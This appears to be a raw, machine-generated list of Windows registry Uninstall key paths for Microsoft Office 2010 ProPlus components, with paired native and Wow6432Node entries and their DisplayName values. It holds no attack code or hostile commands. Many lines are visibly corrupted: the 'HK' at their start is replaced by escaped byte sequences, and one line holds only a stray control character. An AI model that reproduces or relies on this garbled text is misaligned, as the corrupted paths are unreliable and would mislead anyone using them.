\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{4D6FE7B6-559F-4DAC-92CF-A01C24046AEB}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{5AA578BB-759C-40FD-9661-A737C0884541}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{5AA578BB-759C-40FD-9661-A737C0884541}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{5C78021E-3C8E-4EDF-97EA-E9B8D808FD6D}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{5C78021E-3C8E-4EDF-97EA-E9B8D808FD6D}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{5EE42B42-1159-435C-898A-2A3298453B20}
\x5bf8\x5af\x0c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{7AC3F78E-ECA0-45F4-A9CC-3E885DA23662}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{7AC3F78E-ECA0-45F4-A9CC-3E885DA23662}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{7B29D8B8-6A87-496C-A65E-B935E740448A}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{7B29D8B8-6A87-496C-A65E-B935E740448A}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{9D69691D-823D-4C3E-9B12-563A3F520366}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{9D69691D-823D-4C3E-9B12-563A3F520366}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B0D672F7-883E-4279-8E75-D97A5445AB46}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B0D672F7-883E-4279-8E75-D97A5445AB46}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B9B89E01-5B6B-4F73-BC34-B2C0D8ACB4CD}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{B9B89E01-5B6B-4F73-BC34-B2C0D8ACB4CD}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{BA610006-2C39-4419-9834-CF61AB24810A}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{BA610006-2C39-4419-9834-CF61AB24810A}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{F9F5A080-AF38-4966-9A6B-C43DCA465035}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{F9F5A080-AF38-4966-9A6B-C43DCA465035}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-0000-0000000FF1CE}_Office14.PROPLUS_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-0000-0000000FF1CE}_Office14.PROPLUS_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-0000-0000000FF1CE}_Office14.PROPLUS_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-0000-0000000FF1CE}_Office14.PROPLUS_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUS_{09A9DF49-DA06-4093-A2FD-F339211E39EA}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUS_{09A9DF49-DA06-4093-A2FD-F339211E39EA}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUS_{C0BDC1DE-C35E-422B-8CBD-C1D555468720}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}_Office14.PROPLUS_{C0BDC1DE-C35E-422B-8CBD-C1D555468720}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUS_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUS_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUS_{ECC1D579-DC17-4B90-929C-B4A0BB35F7B3}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-0000-0000000FF1CE}_Office14.PROPLUS_{ECC1D579-DC17-4B90-929C-B4A0BB35F7B3}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUS_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUS_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUS_{8C5A05B6-FF56-480F-A0E6-9F4BCA4B4CAC}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.PROPLUS_{8C5A05B6-FF56-480F-A0E6-9F4BCA4B4CAC}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{302A8FE3-EBF5-486C-A431-16A1CD914443}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{302A8FE3-EBF5-486C-A431-16A1CD914443}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{E4D76E88-C65F-4003-9C71-EC4306679D17}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{E4D76E88-C65F-4003-9C71-EC4306679D17}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F9F5A080-AF38-4966-9A6B-C43DCA465035}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0000-1000-0000000FF1CE}_Office14.PROPLUS_{F9F5A080-AF38-4966-9A6B-C43DCA465035}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0409-1000-0000000FF1CE}_Office14.PROPLUS_{03AE1408-7BF1-4AC6-A327-E32E7799BCE4}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002A-0409-1000-0000000FF1CE}_Office14.PROPLUS_{03AE1408-7BF1-4AC6-A327-E32E7799BCE4}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE}_Office14.PROPLUS_{945F1D43-451D-4383-9BBE-241F37950B15}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-0000-0000000FF1CE}_Office14.PROPLUS_{945F1D43-451D-4383-9BBE-241F37950B15}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUS_{688AC276-B332-4A76-AEB0-708AAAE669E5}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUS_{688AC276-B332-4A76-AEB0-708AAAE669E5}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUS_{8DD50F3B-E0BD-4E39-AF1F-2F316B4FC528}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-0000-0000000FF1CE}_Office14.PROPLUS_{8DD50F3B-E0BD-4E39-AF1F-2F316B4FC528}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE}_Office14.PROPLUS_{8DD50F3B-E0BD-4E39-AF1F-2F316B4FC528}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-0000-0000000FF1CE}_Office14.PROPLUS_{8DD50F3B-E0BD-4E39-AF1F-2F316B4FC528}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0116-0409-1000-0000000FF1CE}_Office14.PROPLUS_{03AE1408-7BF1-4AC6-A327-E32E7799BCE4}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0116-0409-1000-0000000FF1CE}_Office14.PROPLUS_{03AE1408-7BF1-4AC6-A327-E32E7799BCE4}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-0000-0000000FF1CE}
\x5bf8\x5afEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-0000-0000000FF1CE}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-0000-0000000FF1CE}_Office14.PROPLUS_{D6A2CD7F-C90C-4B90-BBA7-2BADE2E08610}
